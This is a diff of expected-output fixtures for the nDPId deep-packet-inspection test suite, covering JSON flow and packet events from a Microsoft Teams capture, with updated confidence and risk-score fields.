 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1587041691149,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041691149,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2I\/AqAEGNHJsCOyVAbumbhw9AAAAALAC\/\/8jXgAAAgQFtAEDAwUBAQgKMITP9QAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1587041691168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041691168,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PCRAAHEGa280cmwIwKgBBgG77JWud4Fgpm4cPqASIABnNAAAAgQFoAEDAwgEAggKUqoqrDCEz\/U="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1587041691169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041691169,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2JvAqAEGNHJsCOyVAbumbhw+rneBYYAQEAml0QAAAQEICjCE0AhSqiqs"}
-00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00365{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041691410,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00168{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969}
-00844{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2417,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1587041691582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00870{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2417,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1587041691582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041691611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
-00857{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2430,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682376,"flow_last_seen":1587041692001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9509,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1587041692001,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2430,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682376,"flow_last_seen":1587041692001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9509,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1587041692001,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692528,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"ts_msec":1587041692528,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"ts_msec":1587041692528,"pkt":"KDc3AG3IEBMx8Tl2CABFAACscMtAADIGTDyXCzKLwKgBBgiu1d6yibcLw8sjj4AYAfWSMAAAAQEICnMgXuAwhCbwdBDZH1X2LNSHenV0XPT5UOuNQPq3DAtDODIIsZ4L3xE8W9ceOtMh\/taRn1i3oYCG\/lk5DiXu3JH7RFT8gb0ANFHp9LfVVHPD+A0sB0\/WJaUdO\/QQPvH9sYa9nCylNS5SUfWnuhHHtKPL+2Ql1DSrQI\/KjFfe6Sr3"}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2439,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAA0AABAAEAGrzfAqAEGlwsyi9XeCK7DyyOPsom3g4AQD\/zTvAAAAQEICjCE1UVzIF7g"}
@@ -378,8 +378,8 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1587041692808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041692808,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyWEVIVrX6QAAAAALAC\/\/9dQAAAAgQFtAEDAwUBAQgKMITWWwAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2444,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1587041692880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041692880,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7JY0lYWJFa1+kaAS\/ohhIwAAAgQFrAQCCAoTeUD2MITWWwEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2445,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1587041692880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041692880,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyWEVIVrX6RNJWFioAQECx9\/QAAAQEICjCE1qITeUD2"}
-00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01033{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01087{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00365{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041693412,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00168{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2464,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693428,"flow_last_seen":1587041693428,"flow_idle_time":180000,"flow_min_l4_payload_len":977,"flow_max_l4_payload_len":977,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":977,"midstream":0,"ts_msec":1587041693428,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -388,43 +388,43 @@
 00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2481,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1587041693475,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"ts_msec":1587041693475,"pkt":"KDc3AG3IEBMx8Tl2CABFAADdNJMAAGwR1dQ0ck2IwKgBBg2WyeEAyV65B51cqyKYlOqfHC4eUj71t0+3OzD2kNc2OfFPQNt7fwvuOZltdCnrcr0l94iSgE3VeMj4bdDb+vZ+CObqTNO+QGlUnkV8bcknbNvGUx42nvxp8mhw\/srnkVApKnhDe\/uy29skE82ON2NOubAQd6VBKyo6DT6MaE1A1qjybrSe5XwDrj8OJ1EA\/FUFx\/b063Ar395Oi1sw+DBTZ16KUXaymVRCSFNXRrfz6yWlsSmdtxTLQfpVrW5dlejTUGgaSVxvSg=="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1587041693515,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1587041693515,"pkt":"EBMx8Tl2KDc3AG3ICABFAABg5p0AAEARo1PAqAEGNHL6e8NgDZYATAKlAAMAMCESpEKyND9uZ\/QdWKy6Y58ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693516,"flow_last_seen":1587041693516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041693516,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1587041693516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041693516,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NiAbvwxDFFAAAAALAC\/\/9VoQAAAgQFtAEDAwUBAQgKMITZEwAAAAAEAgAA"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1587041693517,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":109,"pkt_l4_len":75,"ts_msec":1587041693517,"pkt":"EBMx8Tl2KDc3AG3ICABFAABfDxsAAP8RKRvAqAEGwKgBAdnVADUASzsZd8IBAAABAAAAAAAAEmItdHItdGVhbXMtZXVuby0wNQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AABwAAQ=="}
-00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1587041693530,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"ts_msec":1587041693530,"pkt":"KDc3AG3IEBMx8Tl2CABFAACrU5xAADkRak7AqAEBwKgBBgA12dUAlwAAd8KBgAABAAAAAQAAEmItdHItdGVhbXMtZXVuby0wNQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AABwAAcAfAAYAAQAAAAUAQARwcmQxDmF6dXJlZG5zLWNsb3VkA25ldAAGbXNuaHN0CW1pY3Jvc29mdMA6AAAnEQAAA4QAAAEsAAk6gAAAADw="}
-00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1587041693530,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1587041693530,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2486,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1587041693561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041693561,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZBAAGwGgJc0cvp7wKgBBgG7w2KOQNor8MQxRoAS\/\/8u4wAAAgQFoAEDAwgBAQQC"}
